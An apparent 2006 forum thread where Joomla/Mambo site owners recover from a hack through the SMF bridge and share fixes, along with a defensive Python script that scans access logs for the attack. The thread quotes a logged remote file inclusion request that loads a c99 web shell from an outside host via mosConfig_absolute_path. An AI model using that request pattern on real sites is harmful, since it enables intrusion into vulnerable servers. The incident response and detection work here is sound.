Our Joomla website has just been hacked through the SMF component by the Turkish eno7 hacker:
85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.xxxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......
What are the practical steps to restore the website?
And then what are the practical steps to prevent it from recurring?
Thank you
Anna
Hi Anna,
The same IP attacked and hacked my Mambo site with the SMF bridge. I've taken my site down until I also get more details on resolving this. I've also contacted 1&1, who host allianceforvirtualbiz.com, to request the site be suspended, as they are enabling the hacker to function by providing the file.
My webhost is going to block both 85.108.125.96 and 82.165.193.254 at the network level switch before it even hits the servers to ensure this isn't able to reach our network again.
I hope someone from SMF can help.
Thanks.
I found out more details that would pertain to Mambo/Joomla for this hack attempt:
http://forum.mamboserver.com/showthread.php?p=378826
Did you have register_globals set to On or is it set to on for your server? If so, put a php.ini file on your account and set it to Off. I thought I had mine set to off, but I guess there were 2 php.ini files on my server and it was going off the other one :(
Additionally, I'd follow reply #6 and put that code noted in that post into the file for your smf component. Once I re-install mine from backup tonight, I'll give details on what file it would be (I imagine smf.php though as that's the file that was hit in the component).
Thank you Miraenda
My configuration.php is gone, empty... I'm trying to locate one in my back up files & I'm not sure which one is the correct one.
Anna
I've got hit by this also and had to remove the integration of SMF RC1.2 from my Joomla site.
My logs were rotated before I could get to how they uploaded it - but I found a url very similar to the above one in my webalizer :)
Were you running Joomla 1.0.8? As that has known vulnerabilities, I'm thinking that was the reason.
Hi Tony,
The issue is having register_globals set to ON. If you do, you need to change it to off right now.
Next, you need to input in smf.php at components/com_smf the following code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');
Both of these will prevent this from happening again. It isn't the version that's the issue, it's that the component bridge is allowing /components/com_smf/smf.php?mosConfig_absolute_path=http://someurl/somebadfile.txt to be passed. Any component you have that allows that is going to leave you open to attack.
I posted about it at this url on my site that's now back:
http://ratingbar.com/component/option,com_smf/Itemid,26/topic,100.0/
Thanks.
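A log check for the request pattern Miraenda describes above, added here as an example (it is not code from the thread or from SMF): it parses Apache combined-format lines and flags any query parameter that carries a remote URL, plus any request that sets the bridge's mosConfig_* globals at all, since those should never appear in a legitimate query string. The first sample line is the request quoted at the top of the thread; the other two lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/NCSA combined log: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Globals the Mambo/Joomla bridge read from the request when register_globals was On.
# A legitimate request never sets these, so their mere presence is worth a look.
WATCHED_PARAMS = {"mosconfig_absolute_path", "mosconfig_live_site"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_rfi_attempts(lines):
    """Return (ip, timestamp, kind, param, value, status) for each suspicious request.
    kind is 'remote-include' when a remote URL is passed in any parameter and
    'config-override' when a watched config global is set to a non-URL value."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:          # not a combined-format line; skip it
            continue
        query = urlsplit(rec["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                kind = "remote-include"
            elif name.lower() in WATCHED_PARAMS:
                kind = "config-override"
            else:
                continue
            hits.append((rec["ip"], rec["ts"], kind, name, value, int(rec["status"])))
    return hits

# Constructed sample: line 1 is the request quoted in the thread, lines 2 and 3 are made up.
SAMPLE_LOG = [
    '85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.xxxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"',
    '192.0.2.10 - - [17/Jul/2006:09:01:10 -0400] "GET /index.php?option=com_smf&Itemid=26 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Jul/2006:09:05:42 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=/var/www HTTP/1.1" 500 0 "-" "curl/7.15"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Legitimate redirect or return parameters that carry a URL will also be reported, so triage hits by parameter name and by whether the response status was 200.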
Thanks for the info Miraenda,
Tony
You're very welcome Tony :)
Actually, part of the problem is also having allow_url_fopen set to On.
This has been secured in bridge 1.1.5a. I suggest upgrading:
http://www.simplemachines.org/community/index.php?topic=97649.0
There were 3 attempts to hack me after I made the 2 changes (register_globals to off and the code inserted into the smf.php file), and they haven't been able to get through. Does the new bridge have this code in smf.php now or not?
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');
If it does not, can this please be added to the newest bridge?
Yes, it is there.
Cool, thanks Orstio :D
Thank you Orstio, the above bridge is for SMF 1.1 RC2 only, I have RC1. What should I do in my case? Is bridge 3.19a equally secure?
Thanks,
Anna
No, in 3.19a, you will need to add the line of code Miraenda posted above.
I just went through all the files contained in Bridge 3.19a and I'm not able to locate smf.php, which according to the instructions is supposed to go into components/com_smf.
Quote: These go in components/com_smf/:
smf.php
I'm obviously not looking into the right folders. Which folder is that file in?
Thank you Orstio
Anna
In 3.19a it will be in your Step 2 folder, inside the com_smf.zip.
You are the most patient person, Orstio, that I have met in years... ;) Ever?
Thank you!!! Found it, added the 'security' lines, put it in and it works!!! 8)
What a day it had been!
Anna
I'm happy to report that I had numerous attempts of the hacking since yesterday (same as Miraenda) and they were all unsuccessful. ;D
Thank you again
Anna
Great to hear Anna :D
Good stuff, thanks! :D
Glad it's helpful myuption. Being hacked really hurts :(
Quote from: Miraenda - July 22, 2006, 12:18:05 PM
Glad it's helpful myuption. Being hacked really hurts :(
I know, it has happened to me also :(